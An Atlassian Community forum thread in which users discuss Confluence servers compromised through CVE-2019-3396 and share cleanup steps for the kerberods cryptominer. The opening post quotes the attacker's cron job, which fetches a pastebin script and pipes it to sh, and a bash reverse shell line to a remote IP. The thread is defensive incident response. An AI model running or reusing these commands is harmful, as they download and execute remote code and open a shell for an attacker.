Create
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
Sign up Log in
Products
See all
Community resources
Interests
See all
Community resources
Top groups
Explore all groups
Community resources
Celebration

Earn badges and make progress

You're on your way to the next level! Join the Kudos program to earn points and save your progress.

Deleted user Avatar
Deleted user

Level 1: Seed

25 / 150 points

Next: Root

Avatar

1 badge earned

Collect

Participate in fun challenges

Challenges come and go, but your rewards stay with you. Do more to earn more!

Challenges
Coins

Gift kudos to your peers

What goes around comes around! Share the love by gifting kudos to your peers.

Recognition
Ribbon

Rise up in the ranks

Keep earning points to reach the top of the leaderboard. It resets every quarter so you always have a chance!

Leaderboard

Join now to unlock these features and more

Come for the products,
stay for the community

The Atlassian Community can help you and your team get more value out of Atlassian products and practices.

Get started Tell me more
Atlassian Community about banner
4,557,507
Community Members
 
Community Events
184
Community Groups

WARNING - Confluence server hacked...

Kevin Rodgers
Kevin Rodgers Apr 10, 2019

I'm running confluence on two different systems, both were hacked. The hacker created a crontab file named /var/spool/cron/crontabs/confluence. 

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Wed Apr 10 07:22:48 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/10 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh

 

The cron job appears to open a bash session to a remote location.

bash -i >& /dev/tcp/45.76.191.111/2012 0>&

Is there a security fix?

Answer
Watch
Like foxervn likes this
13982 views

7 answers

3 votes
Craig Castle-Mead
Craig Castle-Mead
Rising Star
Rising Star
Rising Stars are recognized for providing high-quality answers to other users. Rising Stars receive a certificate of achievement and are on the path to becoming Community Leaders.
Get recognized
Apr 10, 2019

Hi Kevin,

What version(s) of Confluence are you running on these systems?

CCM

View More Comments
Like
Craig Castle-Mead
Craig Castle-Mead
Rising Star
Rising Star
Rising Stars are recognized for providing high-quality answers to other users. Rising Stars receive a certificate of achievement and are on the path to becoming Community Leaders.
Get recognized
Apr 10, 2019

There was a security alert put out recently (https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html) which includes 6.10.1 as one of the impacted versions.

As a first step, action the "Mitigation" items on the above page and then plan your upgrade ASAP.

 

CCM

Like # people like this
Reply
1 vote
mah0899
mah0899 Apr 15, 2019

I was able to stop it from reinserting the cronjob using root to

rm /var/spool/cron/crontabs/confluence && touch /var/spool/cron/crontabs/confluence
Reply
0 votes
Frank Wong
Frank Wong Apr 18, 2019

Does anyone know what does the kerberods malware do? I haven't been able to find information about it.

I run Confluence with an unprivileged user which is not a sudoer either. So I'm not sure to what extent is the damage. As the user that runs Confluence, definitely has read/write permissions on the filesystem where the data is stored, although hard to say it would have access to the external database.

View More Comments
Like
Like
Reply
0 votes
Diego
Diego
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
Apr 16, 2019

Hello there! Just so that we have a full set of information about this situation, here goes:

Based on your version and symptoms, it sounds like your instance might be affected by an opportunistic attack against the CVE-2019-3396 Widget Connector vulnerability from March 20th (see Confluence Security Advisory - 2019-03-20). We've seen an infection going around that injects malware and the bitcoin miner it tries to run uses all the CPU available on the box. Initially the kerberods malware was being deployed as the payload, but other attacks might be trying to inject different payloads.

I'd recommend tackling things in this order:

  1. Kill malicious processes
  2. Clean up your crontab
  3. Upgrade Confluence
  4. Use a malware scanner to find remaining malware traces

Malicious processes

The top command will help you find processes (probably running under the confluence user account) that are consuming a large amount of CPU. If Confluence is currently stopped, you can probably plan on killing any processes running as the confluence user. note the process ID (pid) from the top output and then kill the process using kill -9 followed by the pid. Example:

sudo kill -9 12395

Clean up your crontab

Since most malware adds a cronjob that relaunches the malware every few minutes, you'll also need to check the crontab file and remove any suspicious-looking entries. For Ubuntu, this is stored in the /var/spool/cron/crontabs/ directory. Normally you should use the crontab command to edit the crontab, but for cleanup purposes we'll be inspecting the file for any pre-existing entries.

Using vim (or whichever text editor you're comfortable with), you'll open the file and remove suspicious-looking jobs.

sudo vim /var/spool/cron/crontabs/confluence

Confluence comes up on system startup through the SysV/systemd daemons, so we would expect the confluence user's crontab to not exist under normal circumstances. It's most likely the case that any entries in this file are malicious, but make sure you check them before deleting them entirely.

Upgrade Confluence

Once your CPU is under control and new malicious process aren't spawning, you need to upgrade Confluence to a version that isn't affected by the vulnerability. I'd recommend looking at one of these versions (latest releases as of this post):

Use a malware scanner

Finally, you need to clean up any remaining traces of malware on your system. The LSD malware cleanup tool will be useful for removing the Kerberods malware. Other malware payloads might need different cleanup tools depending on which attack and payload were used. A good starting place for detecting other types of infections are the scanners linked here. Once a particular infection is identified, googling for "____ removal tool" is a good place to start if the scanner was unable to remove the malware automatically.

Reply
0 votes
mah0899
mah0899 Apr 15, 2019

I Upgraded confluence after infection, so Infection remained.

My Confluence cronjob pointed to this one: https://pastebin.com/raw/Zk7Jv9j2

I used evey command to see if anything is still running, so important points:

  • cat file /tmp/.XIMunix - It contains the PID of tha mein process (called scsi_eh_1 in my case)
  • rm /tmp/.XIMunix (I also deleted /tmp/.XIMunix)
  • Search everywhere for kerberods and delete it.

Currently, it seems a no activity from that piece of junk is left. As everything was running as confluence user, you can verify by ps'ing for that user.

What maybe helped me was, that I deactivated password access for the root user.

View More Comments
Kimberly Deal _Columbus ACE_
Kimberly Deal _Columbus ACE_
Community Leader
Community Leader
Community Leaders are connectors, ambassadors, and mentors. On the online community, they serve as thought leaders, product experts, and moderators.
Become a leader
Apr 15, 2019

*deactivated password access for the root user

Absolutely do this!  The best way is to only allow su to root, and limit programs with root access.

Like
Reply
0 votes
Kirill Anufriev
Kirill Anufriev Apr 15, 2019

Have the same issue with confluence 6.12.2 

My symptoms: confluence stop working and every time i start|restart it killed by system(?)

Console logs - https://pastebin.com/2kAt8DU8

@Kevin Rodgers thanks!

Reply
0 votes
Gonchik Tsymzhitov
Gonchik Tsymzhitov
Community Leader
Community Leader
Community Leaders are connectors, ambassadors, and mentors. On the online community, they serve as thought leaders, product experts, and moderators.
Become a leader
Apr 11, 2019

@Kevin Rodgers

Better way also, reinstall OS as well, and review exist your infra, also, change passwords.

 https://www.virustotal.com/cs/user/bartblaze/

Reply

Suggest an answer

Log in or Sign up to answer
Confluence
Confluence
TAGS
AUG Leaders

Atlassian Community Events

See all events